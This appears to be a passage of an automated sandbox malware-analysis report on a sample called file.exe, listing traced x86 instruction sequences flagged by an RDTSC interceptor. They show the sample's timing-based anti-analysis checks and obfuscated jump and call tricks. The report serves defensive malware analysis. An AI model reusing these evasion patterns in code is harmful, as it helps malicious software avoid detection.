    0x00000015 push dword ptr [ebp+122D0C35h]
    0x0000001b sub dh, 00000007h
    0x0000001e sub dword ptr [ebp+122D1814h], ecx
    0x00000024 call dword ptr [ebp+122D1926h]
    0x0000002a pushad
    0x0000002b add dword ptr [ebp+122D18A0h], edi
    0x00000031 xor eax, eax
    0x00000033 clc
    0x00000034 mov edx, dword ptr [esp+28h]
    0x00000038 cmc
    0x00000039 mov dword ptr [ebp+122D2AF3h], eax
    0x0000003f mov dword ptr [ebp+122D18A0h], eax
    0x00000045 mov esi, 0000003Ch
    0x0000004a or dword ptr [ebp+122D18A0h], ebx
    0x00000050 add esi, dword ptr [esp+24h]
    0x00000054 stc
    0x00000055 lodsw
    0x00000057 stc
    0x00000058 add eax, dword ptr [esp+24h]
    0x0000005c stc
    0x0000005d mov ebx, dword ptr [esp+24h]
    0x00000061 jmp 00007FFAE90574D8h
    0x00000066 push eax
    0x00000067 push eax
    0x00000068 push edx
    0x00000069 push eax
    0x0000006a push edx
    0x0000006b pushad
    0x0000006c popad
    0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388792 second address: 1388799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388799 second address: 13887EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FFAE90574D5h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop ecx 0x00000016 push esi 0x00000017 jmp 00007FFAE90574D0h 0x0000001c pop esi 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push ebx 0x00000021 jmp 00007FFAE90574CAh 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jo 00007FFAE90574C6h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13887EF second address: 13887F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388ABB second address: 1388ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388ABF second address: 1388AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388AC3 second address: 1388B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 51A8F6E5h 0x0000000d mov edx, dword ptr [ebp+122D1E9Ah] 0x00000013 lea ebx, dword ptr [ebp+1245A5A4h] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FFAE90574C8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 call 00007FFAE90574CAh 0x00000038 ja 00007FFAE90574CCh 0x0000003e pop edx 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 jl 00007FFAE90574C6h 0x00000049 pop eax 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388B1B second address: 1388B25 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAE905AE0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA6A8 second address: 13AA6C4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAE90574C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007FFAE90574C6h 0x00000011 pop eax 0x00000012 jc 00007FFAE90574D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136A93A second address: 136A940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8343 second address: 13A8361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jmp 00007FFAE90574D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8361 second address: 13A837E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jmp 00007FFAE905AE15h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A837E second address: 13A8386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A850B second address: 13A8511 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8511 second address: 13A8535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAE90574CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FFAE90574CDh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8535 second address: 13A853A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A853A second address: 13A8544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FFAE90574C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A86BC second address: 13A86D8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FFAE905AE16h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A86D8 second address: 13A86E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007FFAE90574C6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A883D second address: 13A8841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8841 second address: 13A886C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFAE90574D7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FFAE90574C6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A886C second address: 13A8884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE14h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8884 second address: 13A8891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8B2A second address: 13A8B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FFAE905AE0Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8F9A second address: 13A8F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8F9E second address: 13A8FC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007FFAE905AE13h 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A915A second address: 13A9173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE90574D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9173 second address: 13A917B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A93C6 second address: 13A93CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A93CC second address: 13A93DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jl 00007FFAE905AE0Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9D73 second address: 13A9D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE90574D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9EEE second address: 13A9EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9EF2 second address: 13A9F02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FFAE90574C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9F02 second address: 13A9F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA07C second address: 13AA080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA23B second address: 13AA256 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA256 second address: 13AA25B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA25B second address: 13AA278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FFAE905AE06h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAE905AE10h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA50D second address: 13AA51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 jo 00007FFAE90574D6h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA51C second address: 13AA524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DEC4 second address: 136DECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B76A5 second address: 13B76AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6DFD second address: 13B6E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6E01 second address: 13B6E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6E07 second address: 13B6E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6E10 second address: 13B6E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE905AE0Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6E24 second address: 13B6E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FFAE90574C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B7522 second address: 13B7526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B951E second address: 13B9522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9522 second address: 13B9534 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAE905AE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9595 second address: 13B95D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 add dword ptr [esp], 3A13A091h 0x0000000d call 00007FFAE90574D4h 0x00000012 jl 00007FFAE90574D3h 0x00000018 call 00007FFAE90574CCh 0x0000001d pop esi 0x0000001e pop edi 0x0000001f push 72E9155Eh 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 pop eax 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9B89 second address: 13B9BAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007FFAE905AE0Ah 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9BAC second address: 13B9BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAE90574D4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9BC4 second address: 13B9BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA0DA second address: 13BA0DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA0DF second address: 13BA114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FFAE905AE08h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 or dword ptr [ebp+122D3882h], edx 0x00000028 nop 0x00000029 push ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA114 second address: 13BA13B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE8D0C6C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FFAE8D0C6B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA1D0 second address: 13BA1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA1D4 second address: 13BA1DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA400 second address: 13BA404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA404 second address: 13BA40A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA40A second address: 13BA40F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA6AB second address: 13BA6B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA6B1 second address: 13BA6BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FFAE8D89396h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB5D3 second address: 13BB5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB5D9 second address: 13BB5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137499A second address: 13749A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13749A2 second address: 13749D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FFAE8D893A5h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jbe 00007FFAE8D8939Ah 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BBE56 second address: 13BBE6E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAE8D0C6C0h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13749D1 second address: 13749EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE8D893A5h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BBE6E second address: 13BBE84 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFAE8D0C6B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jo 00007FFAE8D0C6C4h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF30D second address: 13BF31B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFAE8D89396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C085B second address: 13C0861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BFB40 second address: 13BFB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0861 second address: 13C0865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C05EC second address: 13C05F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0865 second address: 13C08EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFAE8D0C6C6h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FFAE8D0C6B8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 cld 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FFAE8D0C6B8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 sub dword ptr [ebp+1247CEF9h], ebx 0x0000004c push 00000000h 0x0000004e movsx edi, dx 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 jng 00007FFAE8D0C6BCh 0x00000059 jc 00007FFAE8D0C6B8h 0x0000005f pushad 0x00000060 popad 0x00000061 popad 0x00000062 push eax 0x00000063 push edi 0x00000064 push eax 0x00000065 push edx 0x00000066 jns 00007FFAE8D0C6B6h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C05F2 second address: 13C060A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnc 00007FFAE8D89396h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jbe 00007FFAE8D8939Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C060A second address: 13C0612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C13F9 second address: 13C145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FFAE8D89398h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007FFAE8D89398h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 xchg eax, ebx 0x00000041 jmp 00007FFAE8D8939Bh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push edi 0x0000004a jnl 00007FFAE8D89396h 0x00000050 pop edi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C1DC3 second address: 13C1E53 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAE8D0C6B8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FFAE8D0C6B8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 or dword ptr [ebp+124588C1h], edi 0x0000002f push 00000000h 0x00000031 mov esi, dword ptr [ebp+122D1BE8h] 0x00000037 pushad 0x00000038 je 00007FFAE8D0C6B9h 0x0000003e mov di, bx 0x00000041 jmp 00007FFAE8D0C6C0h 0x00000046 popad 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push esi 0x0000004c call 00007FFAE8D0C6B8h 0x00000051 pop esi 0x00000052 mov dword ptr [esp+04h], esi 0x00000056 add dword ptr [esp+04h], 00000019h 0x0000005e inc esi 0x0000005f push esi 0x00000060 ret 0x00000061 pop esi 0x00000062 ret 0x00000063 xchg eax, ebx 0x00000064 jng 00007FFAE8D0C6C2h 0x0000006a jnc 00007FFAE8D0C6BCh 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C1B65 second address: 13C1B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
